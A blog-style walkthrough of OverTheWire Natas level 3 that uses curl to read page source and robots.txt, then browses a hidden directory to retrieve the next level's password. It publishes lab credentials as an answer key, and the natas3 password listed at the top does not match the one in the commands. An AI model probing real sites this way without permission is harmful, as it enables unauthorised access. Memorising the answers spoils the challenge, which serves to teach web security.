Natas [Level 3] - Overthewire

Posted Jan 23, 2023 Updated Aug 6, 2024

Natas teaches the basics of serverside web-security.

By Dat Vu 2k

1 min read

Username: natas3
Password: h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7
URL: http://natas3.natas.labs.overthewire.org

Again? Liars! Let’s View Page Source, again…

  
curl -i -X GET -u natas3:G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q http://natas3.natas.labs.overthewire.org

==> Results

  
<body>
<h1>natas3</h1>
<div id="content">
There is nothing on this page
<!-- No more information leaks!! Not even Google will find it this time... -->
</div>
</body>

Not even Google will find it this time… is our hint here.

Link referen:

Curl /robots.txt

  
curl -i -X GET -u natas3:G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q http://natas3.natas.labs.overthewire.org/robots.txt

==> Results

User-agent: *
Disallow: /s3cr3t/

Look: Disallow: /s3cr3t/

curl -X GET -u natas3:G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q http://natas3.natas.labs.overthewire.org/s3cr3t/

==> Results

  
<table>
  ...
    <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="users.txt">users.txt</a></td><td align="right">2023-04-23 18:01  </td><td align="right"> 40 </td><td>&nbsp;</td></tr>
  ...
</table>

users.txt is the only file can read

  
curl -X GET -u natas3:G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt

==> Results
natas4:tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm

Alright, i got the password! Moving on to level 4!

==> CTF: { natas4:tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm }

Natas [Level 3] - Overthewire

Further Reading

Natas [Level 0] - Overthewire

Natas [Level 1] - Overthewire

Natas [Level 2] - Overthewire